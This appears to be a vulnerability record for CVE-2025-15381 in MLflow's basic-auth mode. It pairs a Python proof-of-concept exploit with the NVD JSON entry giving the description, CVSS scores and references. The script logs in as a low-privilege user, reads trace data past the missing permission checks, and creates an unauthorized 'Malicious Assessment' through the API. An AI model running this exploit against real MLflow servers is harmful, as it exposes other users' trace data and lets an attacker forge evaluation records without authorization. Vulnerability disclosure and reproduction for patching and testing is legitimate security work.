CVE-2025-15381

import requests TARGET_URL = "http://target-mlflow-server:5000" USERNAME = "low_priv_user" PASSWORD = "password" session = requests.Session() # 1. Authenticate with low-privilege user login_payload = {"username": USERNAME, "password": PASSWORD} login_resp = session.post(f"{TARGET_URL}/login", data=login_payload) if login_resp.status_code != 200: print("Login failed") exit(1) print("[+] Logged in successfully") # 2. Exploit: Access Tracing Endpoint (Bypass Permission Check) # Assuming a trace_id exists that the user should not have access to trace_id = "arbitrary_trace_id" trace_resp = session.get(f"{TARGET_URL}/api/2.0/mlflow/traces/get?trace_id={trace_id}") print(f"[*] Attempting to access trace data...") if trace_resp.status_code == 200: print(f"[+] Successfully accessed trace data (Bypassed ACL): {trace_resp.json()}") else: print(f"[-] Failed to access trace data: {trace_resp.status_code}") # 3. Exploit: Create Unauthorized Assessment assessment_data = { "trace_id": trace_id, "name": "Malicious Assessment", "result": {"key": "value"} } assess_resp = session.post(f"{TARGET_URL}/api/2.0/mlflow/assessments/create", json=assessment_data) print(f"[*] Attempting to create assessment...") if assess_resp.status_code == 200: print(f"[+] Successfully created unauthorized assessment.") else: print(f"[-] Failed to create assessment: {assess_resp.status_code}")

{"cve": {"id": "CVE-2025-15381", "sourceIdentifier": "[email protected]", "published": "2026-03-27T17:16:26.573", "lastModified": "2026-04-28T14:32:08.523", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the latest version of mlflow/mlflow, when the `basic-auth` app is enabled, tracing and assessment endpoints are not protected by permission validators. This allows any authenticated user, including those with `NO_PERMISSIONS` on the experiment, to read trace information and create assessments for traces they should not have access to. This vulnerability impacts confidentiality by exposing trace metadata and integrity by allowing unauthorized creation of assessments. Deployments using `mlflow server --app-name=basic-auth` are affected."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 4.2}], "cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-200"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:lfprojects:mlflow:-:*:*:*:*:*:*:*", "matchCriteriaId": "F18F1880-033C-4E18-913C-6C5356427ABB"}]}]}], "references": [{"url": "https://huntr.com/bounties/149fb2f9-ef4b-4136-a25c-20563451904c", "source": "[email protected]", "tags": ["Third Party Advisory", "Exploit"]}]}}